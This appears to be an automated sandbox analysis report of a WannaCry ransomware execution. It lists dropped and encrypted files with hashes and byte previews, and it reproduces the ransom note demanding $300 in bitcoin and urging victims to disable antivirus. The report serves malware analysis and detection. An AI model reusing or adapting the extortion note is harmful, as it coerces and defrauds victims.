Preview:	WANACRY!....t_....P_...v...\|..!$....\C.~X..n...%-4o....R..!02...\|...a...U.....&...i..U!..in..;@......,.....XVR.......9.....B.... ..M..Q.y...zv[Di..M.G..~.S...Y..m.."..U..q..C....6e...Fa....3Ux...9xQ..h..":qW............Y.....w....=...[.5.l.E..@..0..<.G..R..}.....k......+J<u-q}...G..z!.V......u .1....{O.p..J./%...Y.<..e..K._q.."4.V.....Vk.V.......b.L.K..=......+..w.).._...52..`.O.t..X....B.>3W...?..;.wp.+.Ag..@.=..;.I^>...S%@..".Hw..H...4...v;.-Mb.$........+o;.d.g.![&......._.K...[%F.C.0\s...^?.a{..l.Lh...bn...R 0..y../uBM+ry.d..k.).....=w.......)`.`..V.E..}..%=...I......!.DX..+.I.!L.t....CV...;..:1...S._.5S....dHr~Ms.L..B..dp.C...=G.>.IV....0W;..{.0nA-O..j.OB..g.B+T.(...k..?C.!u6...W=.....z&n.1.v....4BF8".d..Rs?d..S...).6<..p..G.Fx.kz ...&..=S.K.7....h..:..66.....:.....f>I{.U.~.P..:.......^.,f-.o...{....+..0.._<....pg6].z....PU6h.l..4.W...:0sI.S,.....m.....eN.D..$.hd....F..H..-@..m.S.V.4....,.iv..].On....Q&D..) !;.....k...U..'...3....@.

C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\mscc-0.4.2.min[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4872
Entropy (8bit):	7.964869900043767
Encrypted:	false
SSDEEP:	96:o4UzxuHqW9XPLUlfYtXX0HFcBPQEnQWLRl2CnTeQg:5SuKAHtXElcRnn5DLe5
MD5:	DC2FDF8695A91D81B3EFD012C18E6892
SHA1:	CDC98597CC8F7899E7D39789A8F7134A0D11ECF5
SHA-256:	361DE0C6B811B6874FD1EFA545C3A221CDF46C28371B523225545FD008F93526
SHA-512:	EE474105F6DE8218FB3BFB7256AAFE19F13E2446263C2F4F36DB5D6C555C276432979B582871816DDFA4000A0799A51D3AA182253F67B68C77073A44318ADB56
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....P^.:/....;.k...J..{..aF..j..<..o.y...71...E.Y...yk... ..0...r..x#x..{._j.....!........e..g.....p".y.......l0...s)@o..1.;A.1..}........[a[ ..u.1f......~...!..k.B.tU.D...l....#gJ......p..C..e@Q..%..h..(.f......6l2.s.;.\|.S..a.n.j#.N.F.a.......%1..............8.!.v.G"...v.n.n.....].$....3...{.......9u.LJ{......C....d.$.&'. #.vti.i...l....n..!..w.t.@1..nf.`..........M...i.}.c.b...E.x6...N....:....aZr....O.,..N..5qt.w\|..D.W.1......j.X~....b.z.&c.J.\|h.B.P.Jg.<.2!.-D...D...._35l....y.j.2....h...5......-....PgkWrS.:.9.....}.w.f.zo....\|.c2.k.....j. .U.9Q...Q..k......._T<i.OJ...H\| S.-...jn...F.L.......\.}...qKv.0./....9......A...T.R.%ln8-..L......E....M..........t...$.*$Fa[..[T.D....!.....{..0...>..u.$M.CJqY.iPymK...QFz.......$.=.e...a....n...V......../.)..4..X....lphCd........n.a..;e..C.lU.].Fz..w..-N..,8.......l...lbt..............?...C..ll.Z6....L..\|......t.I....#../U?A..?9.....y;..fN..c.).`.LK.O.Vk.........3...FiE......0.b..@<.....FQ

C:\Users\user\AppData\Local\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\AppData\Local\@WanaDecryptor@.exe

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.278920408390635
Encrypted:	false
SSDEEP:	3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
MD5:	7BF2B57F2A205768755C07F238FB32CC
SHA1:	45356A9DD616ED7161A3B9192E2F318D0AB5AD10
SHA-256:	B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
SHA-512:	91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..\|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...\|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673955008222.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998250542188004
Encrypted:	true
SSDEEP:	3072:W1sM6ukNy4fCoxrzIhOYwqxe0HRQevC/qv:W1hrTyrzAwqxeDevC/e
MD5:	6A1B684203AC5585EDCB3DBFFB330E3F
SHA1:	5B8B35C3107EFD49FFDEFF5241214C6AB8E12CFD
SHA-256:	78305E8A376B0E3E4F03D0464E8B485D2A5F9D8EC6D54F5FE06316A5F63CB3CE
SHA-512:	9CEC3C22B37C1984DA2025832F5A46BF8536CDCAA0F51BDBADA6D3AEEF92780F95B5DB2F5DE324D5D1711D37F63E9D7F0C85D9D821D4D557D843D5EB7EA3BBEA
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......t.....@.e.>I.....U....i....M{.X.3T.n........9..jY.-@......v....ZK,L..98.{..vm...3=....../K...ex.....y.Zoh.n,..`.7...\|..@).]n...N....k...(9.),$.^-........A_.6.I.....E.., .....C..2...V.w....:......9.gE....MH.s...[..H.u.....".q{.F..S..r.t..#i.....#........<.U>QN.&<h9_.k.#]y.a..l./..Y.(..m.K.........z%.\|p.j....).#.,.U2UB6.0..e"I...?.F...zyK/QQ...`+...R.R.B..![.\|.&..wr........!..UL\|?O.........'.Z...R!.~P.x.l!.v.>1....S..A....U.....:lM.......$M,.x..@.Sb.T.....['XS ..E..AM..q&O..{.....,.(..c...s.Q.vU.......F.w@.].\1.e_.L..%.[..3(5..F..^]..........};.....&......."..~....5.....W....x.iCb?^.\|..w....z.........@.4\..dZ..;..SN..J.}..i\|vW..8...5`..4..........0C.!.?us...K..X.J.O.~'?.K.YiQ..4f....BY.J}..+..J..-.f.C9.i.9.]....?.c.7.u....../....6d.../.p..G..>....1e....?y..z.K.....C...H...e..T.L4..1%..o..Mz...?...7.,{.N..)`....b....C.&a$.w...c.{.s...~._.+..a.\|..g...6"...u.....s(....#P........'.fA..&..... t&.\a....X.....(.a....... 4+]~6..`.zQ...!

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999802075190868
Encrypted:	true
SSDEEP:	24576:07dmug+TisEJiUOsiEt6rvg41BFPxAUrmMK3C:05mx+TisE0x5fFpAUrnK3C
MD5:	A539D13CBE8FC45548B5B0148E9BF3ED
SHA1:	D4FC2693C7F818A0AB753D04925130563B11E9E5
SHA-256:	D9FC990140E9A2F289BEF843B38E3C6D20620CAEE69D7454727BC78F50F195FB
SHA-512:	E80F8AFBDE91D2E5273514FBCBF4EDC4A615F38AD091592630DD33D400DE18635E7BDE43BBA5B1580AAE53B0BDFBF37489E08F9E6935E0B17F7D26BE4AE7C270
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........LV...-+.M0..8..J&1.).>.....\|..B........>-.(-.23..G...5.6.....I.D$@.F..a'e6...6.+q.,\|......./.4..._2.../....;.a.<...}o.....mZsf.V.8&..Z{.G}...Un..d.:......a...l.EM..5.-.."{.s.%v.".@......\|.a.Rj......!#0....C.y...^.r-.).7Pe..^.n1...kF.wK.\|.....\|0..................g;O.J..M~...z.u.G).Qv....c.... Ce....P..;..4..~Y.NM.!...Q$......1..j.B..o$$}xh.[....4..uS......irY[`.8..S.h....q.&.b..K..v.G'.1F......`...].._....-......>.....l..&.YY.cc../..cd@.o.....;..R.B.@f`...v..@..y....NiF...X.......Go...#w{....C.....uC.M..._.9p.H....w..ZE..=..#.c....j..$...3r.].......-.w.@R....y._.wM'..K{.z../.[.e.P.6.t......X..O.!.8~...G...NN...Yv....?....-.(.dpK......n..q..#..uY.>......x.a`....S..u.z..c.3...\|.V..5...d.p.....mG..iwX2)U....?...q..(y..o..l..)..8...R....)upC.[.a.j.....+.P"......^{b.]..W.4.B..................R.B.&4...s ..j;..b;..7e...P.F%z_s...N.`:..3G.#.kq.J.e3.+...`H\....1.._.I..^.....6........yEH.I(..n.............{.~..w]..6..[...

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999829179424425
Encrypted:	true
SSDEEP:	24576:nl8ZK75SDTUy4wPvMmGfdUKY8RlOL1qqxtpfoiFFfM:aZq5SDTT4wPkNfWKYdB1xEiFdM
MD5:	4385829388DAA71D25EDB9AF1ACDA989
SHA1:	D4D764A474DA47D7D85100B3A32D873EBE5F2B8A
SHA-256:	F28EA68F7433C0AB5BA76880722F6A1F2D142E128FBF2666EB8A10768535A150
SHA-512:	91A992A64C646579E1968613804E420071743BB56F4EEBBA6444CB1F22FE068F7E2943A33A530DC359FBCE7CE030280D41EB9A981721CFDF9A2020413CF32230
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......F\.i[)l.\.2...Bb.Y\|..r.]......;s...s.& .._.....K.......g..Y(.k[L..o.....2...D~.e......0.ub,.+.\F8.}.Mc.J3.....4...r:#...&.-[m.s....P5.c.e.X`d....n.B.b......\0.c./w.....7.Q..'.'1.w..<K... ..X.5..gJ<?....)&..k...9.8G..[.....!{i?.9.Kno.5../....9.............qH.`..~.../bY.....^(..#.K...?:. {R....U.#A..6...[.(.....\|7._..]).5z....YU$.O.1i.t.0..~.^.!#.aB@;\|.p..ckR.....n......N.....T-.l..u,Kv8._.....ER...F..\|G...Y+A......t.l5.y.G...x8\.Yh.t."...6..d... ...[..._.gg&+..p`3..8.4.....I..B....s/.LS\.y\.S.d..........M.pM.......V..........A...@...%..V.....{k..w 7...V..J....P..K.o1.-....nH@.B.7..v...o..-`V..W2{...@..........P.J.>.....7..M.......N...P.2...q.K).4.G....'.0[....x.RUi........:..U.o....r.'.....M=} .q...&....W.6.2}0..#.]....3n.po./0.s..[c.g\.}4...c.....Ng/z..e.;..(.m.)..F....4.z..3...........f^.@.}Q..$g..k+......O...N..<....j.nR..3ws..XE.m..U&.\.a.$..Vq..H....B...@...[T....Tq....]A.....IS..PK..."..6C.B./.Iw(.H..'..S...].n...w

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	3656
Entropy (8bit):	7.948044277992892
Encrypted:	false
SSDEEP:	96:oM6ZX2KBH3ucAPVSMuT01vftDxe5TvMCpzLAwir8:6F2+XucMEMm0BtDOvM8ALr8
MD5:	C6B109933DA737C3549689CA7413EFEF
SHA1:	D2F0458E902F720246ED52D2EF2A03ACC5808E21
SHA-256:	F6DF32B4319236E003C21CA6C129F61AFE43EFAA16EB67397044F503C781EF64
SHA-512:	A925FDE0ADC88F643471113E37F454D666C1D7CBDB8AAC676C360C0D027F055D86F888D038F53DBA22858DA071434B21F79E290914BCF88863D02FEC735C3992
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........rsZR^...... g.~...........%...\M!`dx.]G..........F......}_...f0..n.<Ot..A/.A........D...w.1x.<`jm.V.....7.Y.I.b.h.sz..q8.g@.o./........".!Q^.........z@..Ai&&{K.n..e2z.......N.....J6`E.......zVOc.`Rn...H..ze?D._..O;...... 8..+...s.9.2(....,........Qc[...L.<..V...%....A.e..`...h...o.......4..(...9%......h.. T.~~.>.2..$M>..x.t.J.z....^.....3.o?.....c9.O.).,..../..... I...t...p...`..p....M<.y..l....@..w{..m..G)..0..Nv..+..v...jO.sb.m.n.q..i.n3........!.=R..].}..G.X.y.)g....vt...>M.........6...+l......M.Pm8PV9........M../.kQ.............s.:.s.\|....aj.....(..M`SE2...}.>.V.j...........+....Y.a..Y.....".M....".N....... ....c..\{._~... y..~...o.B_...M.%#..$.....+.BL.}.If.N....^..}..8.\[..8y.>$.... NX.P....t.....H......%L. .t......,.....q.A...u.. .xF...U..\|..h.......m)..gl..........#.}.....D.f.r..../.....7z.v.. u.......E>#..........7.Tc.)d.).t........T....Z.-.=.....5....)...U9......H...{..eM.y..V..}*D..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	440
Entropy (8bit):	7.535081703700819
Encrypted:	false
SSDEEP:	12:bkEE7OWV9LkJoJ6VSmLZVkx4h6aiOoFAadb9TibmvsZgBjSzePn:bkhfVhkJI40pJYFyBXP
MD5:	F5D929ECD5184AA91D3149BCF45E1657
SHA1:	5B57095028A2BD9EA53D2F242C5538766A929E9C
SHA-256:	678910B3957356D61EEDD77AA6CB2D68EA6C00E6AF63A1B4064E4BD826D6EE50
SHA-512:	AA38B9E2DBA0D130879D97DEFF218EEAC592C06985725D380D65C6D3C96051C1857DF83E349CCC8E82F01293056109AFB627C3F9DC42A18047A2FA449ECAED64
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......sd.h..O.5o.1f..s..kA..q .......%...a......BY{...lS .........H.A^....4.....M=......=O9..f...8~.:Bw..Y....<I. `\W>e......n~.^..7o~E..s..c<Wo4..v...#....OS.....i...Pw......H..U..H..{R.6j..w....?.B...A..G.(.'.k\|yY5.;.s.:l.....{.y7V.X.aXn....._&.................w..o~.4..N.O.j.h.......;..B..$...\|...UD.S...d.S`.v...I.p.....6.....rZ.{.....y...L.?.P....t.#......3%.@u)P`..W....",U...-....b&w...q.3...)R.?....4.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	376
Entropy (8bit):	7.349893796333738
Encrypted:	false
SSDEEP:	6:bkE2HxeV5+8tJ67RpfLPAra4nufBWo0EJNwL8vkR7ZLpQ59rcO/+BAytO/U1k5+t:bkE2ROrQRpfjmaquft1IwcnLa9rcO/sp
MD5:	596F571F7CB512989B479B17F892C125
SHA1:	DBCD9EFD9A4385449E940222B73F35882F77CA1D
SHA-256:	3AD7C3CA611E2F742C68A7F2D39B9A10C778C0CEF41B0AD46BB85DF72255DE62
SHA-512:	3F50CCA3D01C6187F4BC423CB07B648078639AF2E302F022AF952F0E8086C69646871A6E10A33C5986B177D23C65E8A63C9D95928344A31C92CFF7A995AA15CA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..............p.>]...d[.!I.~.Z.Dv.J.........m?....g.I{A...H..jH`<..+..GE..M....U;?....%.S/...]B^...^..:zi]<zd........M?...,Q.<..n ....`{.....[.......e...t.M..Xh..a.;$[<.'.b.VFpt....nX..F6N\|K[7....E...V....\. mF.2..K...h.......4.....2J..<9f...#4g... .b...._.......5.8X...l(...m.3./Q...\.\G8..w.p...W.W.._R.z.K...:.lt>...r..T4.GK.2e...=S..=..N...+/..=..]v8

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_128.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	3496
Entropy (8bit):	7.947727550775951
Encrypted:	false
SSDEEP:	48:bkeFomc/f37J8rt8zYF1kVTqzrwokiSV7T8/oya8QL7j1KZLGtHoSAH6xrfXhA2r:oGcXlGtYHVWlRSV7Tp8Av1vRo+rfVUu
MD5:	9FB390516524818587D6E8067837CA9B
SHA1:	E56A33EA47903FC37C7B2ED1EA9B4C6D72F50F30
SHA-256:	C69069BB4FD29107433B33D0EF1AD44EF1A1668460F3ECA7739FEFBC5FF060FC
SHA-512:	0EA9DC6283CC7587043B19D758F4E348FF9E9B6E10EA579C5CD6F918676DC45EAA5E9C2FCF24A84341D03FD3DC5AD47741F64B2FB5A90ED380059BEAD6613863
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!............U....8..v.v'..;.5..}7........9.t.Y..\|.t....]U<S.z..5PB.A.).2.D.x..C..Y2-....I..d......F.../}V..75.=...c.....+>.....=T.'.......yi.6.......+.E.MF............d@MN?L0M~...C......x.......l...Jp..B..G.$...C&3.5..'./...x......_...r.G.\|A./..is...............%..i>.T\|3oM.`fq-j..y..Yl...?.i..(.....]S.5.GhZ3=..]..t}..~~..K..v....a.6H_.:.....k.~.~..24.......S...Vb..W..M.2..O.......}N....B...?..CRH......Y............AT../...U...g.a4.I..8.}.y}....0<...u....hQ.2...lf.fE.P...K\|@..4./.\|U...".N..........m<Eu..e...9..t}R..q..p.....#..\. ..Z....8)......&!;.p..B.L......&Z.?/^1....\|........oD.b.2...........m.a.=].~.\.H9z....G...d(:...>\..qiA.h...ViJ.....a..h.j..Z.".aC.C. D.1..M.....]....r...!....J .l.t.R.:...\|o&@<.?.,Y.s....;.B.d?...M?s.?s..s.......\|.xw...1..us.".I%......$]3.M..d98..o9..........b8..d..9....^..K...4..e..S......l+......e....o...&..^i..S#".%..Ng*.H........Z......\|.#..bcD\|.r.R...b.s..+.XF...........e..N6fo....D.bO.>.`.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	424
Entropy (8bit):	7.431082733339437
Encrypted:	false
SSDEEP:	12:bkEULWqyZ6fsccmrF/D+34FzI4GWrluBvbgq/un:bkvitoymrt+Ix/nIBE8un
MD5:	BCA924CD98321BC501E5668C4C88DE68
SHA1:	822BAAB7F32FAE12BC7C7604DE8B388E1B85163A
SHA-256:	C4BEAFEF4C315642FFD24B7BA3E04EE8BE778CA967BB30355835563C51D1C73B
SHA-512:	BDD905553264BB608D0A9078A556E698E8FA30E14D97CB67C955DAB1F6378475FA2CF87F2CD56E92A041094FA2FE0D78C3BBFA290034F16C829EEBCDD68CB401
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....,e......V.\|..9..B;..\|....:Q..J&Pf0Eo.z..f..t..[y.......q.(.5.:`.......&.......8.<.Z.......RK9........d.......M../..`...2.[]iV.Cr/....P.uF+...D.5C4...u..-.......W.+.d..9..m..g.'vZ .a....=..>i.....i:.G4;[.a.;4c........./...M........B.8..#b=...............l%.?.7......u.V.&....Q.a.J2..%c..z.,..:.WYq`.^.v_z..E..."<.al.J.w.I..IN@..d.!..aBh......@.p..z.:v{-*.9^.{.._..)...Y.r...-._.q.F........>....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	376
Entropy (8bit):	7.331944230811295
Encrypted:	false
SSDEEP:	6:bkE5ZHHedt1CboiKLwmKBrDEGuCl7Fu07onF9xCXr81oTQ6fdyD1fvtfKByzZU5J:bkE5lHmtMwxKdDE7CllurCXr4yEntfKj
MD5:	F4A698DED4CC6DB94638FAA4D23E4E6C
